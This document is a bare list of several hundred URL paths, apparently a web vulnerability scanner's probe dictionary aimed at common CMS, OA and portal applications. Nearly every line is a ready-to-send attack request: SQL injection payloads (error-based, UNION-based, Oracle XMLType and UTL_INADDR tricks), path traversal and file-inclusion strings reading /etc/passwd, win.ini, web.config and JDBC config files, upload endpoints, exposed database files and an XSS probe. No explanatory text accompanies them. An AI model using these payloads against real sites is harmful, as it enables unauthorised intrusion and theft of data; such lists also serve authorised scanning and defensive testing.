/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
